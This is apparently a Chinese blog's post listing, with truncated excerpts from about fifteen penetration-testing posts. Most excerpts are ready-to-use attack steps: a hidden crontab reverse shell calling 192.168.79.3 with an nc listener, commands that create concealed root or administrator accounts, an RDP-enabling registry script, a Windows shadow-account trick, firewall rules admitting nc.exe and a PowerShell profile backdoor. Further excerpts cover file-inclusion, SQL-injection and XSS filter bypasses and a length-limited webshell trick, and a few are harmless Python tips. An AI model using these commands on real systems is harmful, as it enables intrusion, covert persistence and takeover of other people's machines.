- 博客(15)
- 收藏
- 关注
原创 防火墙相关命令
查看防火墙配置 netsh firewall show config 允许指定程序全部连接(Windows Server 2003 系统及之前版本) netsh firewall add allowedprogram c:\nc.exe "allow nc" enable 允许指定程序连入(Windows Server 2003 之后系统版本) netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="
2022-04-14 17:04:36
3183
1
原创 一行代码开启python、php简易服务
python # python2 python2 -m SimpleHTTPServer 8080 # python3 python3 -m http.server 8080 php php -S 127.0.0.1:8080
2022-04-14 16:56:52
831
原创 python脚本小技巧
交换变量值 a, b = 5, 10 a, b = b, a 将列表中所有元素组合成字符串(以空格分隔) a = ["Python", "is", "awesome"] print(" ".join(a)) 查找列表中频率最高的值 a = [1, 2, 3, 1, 2, 3, 2, 2, 4, 5, 1] print(max(set(a),key = a.count)) 检查两个字符串是不是由相同字母不同顺序组成 from collections import Counter Counter(str1
2021-12-25 22:18:08
513
原创 PHP伪协议-文件包含
lfi.php <?php include $_GET['file']; ?> php://input php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。 注:当enctype="multipart/form-data",php://input 是无效的。
2021-12-24 22:39:54
2086
原创 隐藏计划任务反弹shell
靶机执行 (crontab -l;printf "* * * * * /bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.79.3/2334 0>&1';\r%100c\n")|crontab - vps监听 nc -lvvp 2334 该计划任务是隐藏的,使用contab -e,选择一种编辑器后可以查看到内容 ...
2021-12-22 22:28:37
2270
原创 创建具有root权限的账户
第一种 # guest:123456 useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test 第二种 # t0mcat:123456 perl -le 'print crypt("123456","salt")' # 密码:123456 echo "t0mcat:sahL5d5V.UWtI:0:0:/root:/bin/bash" >&
2021-12-21 22:51:19
626
原创 SQL注入绕过
空格字符绕过 %09 TAB建(水平) %0a 新建一行,换行 %0b TAB建(垂直) %0c 新的一页 %0d return 功能 %a0 空格 %00 /**/ /*!*/、/*!50009*/ # 受版本限制 内联执行 浮点数和科学计数法绕过某些WAF NULL值和 \N 绕过某些WAF 引号绕过 如果过滤了单引号,可以使用双引号、反引号或者十六进制 去重绕过 过滤逗号 join绕过 like绕过
2021-12-20 22:51:34
289
原创 组策略脚本维持
在gpedit.msc上打开组策略,在Windows设置选项上有个脚本(启动/关机)选项 脚本参数可为空 # shell.bat 放在开机自启动目录 net user hack$ 123456 /add && net localgroup administrators hack$ /add
2021-12-19 22:39:14
2171
原创 PowerShell配置文件后门
PowerShell 配置文件是在 PowerShell 启动时运行的脚本。 在某些情况下,攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件,以包括任意命令,功能,模块和/或PowerShell驱动器来获得持久性。 案例 echo $profile Test-path $profile # 结果返回false,表示没有该文件 New-Item –Path $Profile –Type File –Force # 强制创建一个 $string = 'S
2021-12-18 23:18:36
1226
原创 Windows隐藏文件
attrib命令 隐藏文件夹或文件 attrib +s +a +h +r test Attrib +s +a +h +r 1.php 恢复隐藏的文件 attrib d:\test -h -s /d /s attrib d:\"*" -h -s /d /s
2021-12-17 22:21:23
123
原创 创建影子账号
在账号后面加个美元符,可以隐藏账号;但仅仅只是在命令行无法查看到,在用户面板仍然可以看到该账号。 解决办法 进入注册表 HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User 编辑需要权限 查看Administrator账号对应的文件 复制该文件内容(右键全选-》复制)F文件 粘贴替换掉需要隐藏账号的内容 分别导出这两个文件 导出后,删除该账号 也可以使用命令行来删除ner user hacker$ /del 删除后,双击刚刚导出的两个文件,导入到注册
2021-12-15 20:01:00
463
原创 远程终端问题集锦
1.描述 远程终端的默认端口是3389,云vps一般会开启,没有启用的情况下,在较高的权限下可以使用注册表命令进行开启。 2.注册表开启远程终端命令 2.1 2008 2012 2016 开启3389,写入到bat文件中 echo DO ALL IN CMD! reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f re
2021-12-14 20:59:12
2554
原创 一不小心发现某站的存储型XSS
一不小心发现某站的存储型XSS 废话不多说,直接开干。经过测试,在个人资料板块,发现MSN处可以利用。 输入123,审计源码,分析HTML,尝试构造payload。 闭合value属性 " <scritp>alert(1)</script>// 发现有waf,直接被ban了。en……………… 尝试能否绕过看看。 输入成对的 ”<>“ 符号时,会被拦截,估计规则库匹配了成对的 ”<>“;这样子看的话,插入标签是不太好利用了。 换个思
2021-09-27 19:48:44
1365
原创 可控字符串长度受限情况下GetShell
可控字符串长度受限情况下GetShell思路分析利用案例EXP 环境:命令执行只允许输入七个字符,尝试写入webshell 思路分析 通过创建特殊的文件名(含有php代码),创建完后使用ls命令:ls>0 (把当前目录下所有的文件名写入到文件0中)。 shell命令太长,受长度限制,可以使用 “” 来分割,实现换行输入,最后写入到一个新的文件,然后执行:sh 0。文件0 执行后产生 1.php 就是写入的php马。 注:要考虑写入的先后顺序问题,使用ls可以加上-t参数来排序(最新创建的在
2021-09-23 21:00:18
551
原创 PHP正则回溯溢出绕过
PHP正则绕过案例代码分析EXP 案例代码 <?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is',$data); } if(empty($_FILES)) { die(show_source(__FILE__)) ; } $user_dir = './data/'; $data = file_get_contents($_FIL
2021-09-22 20:07:02
530
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人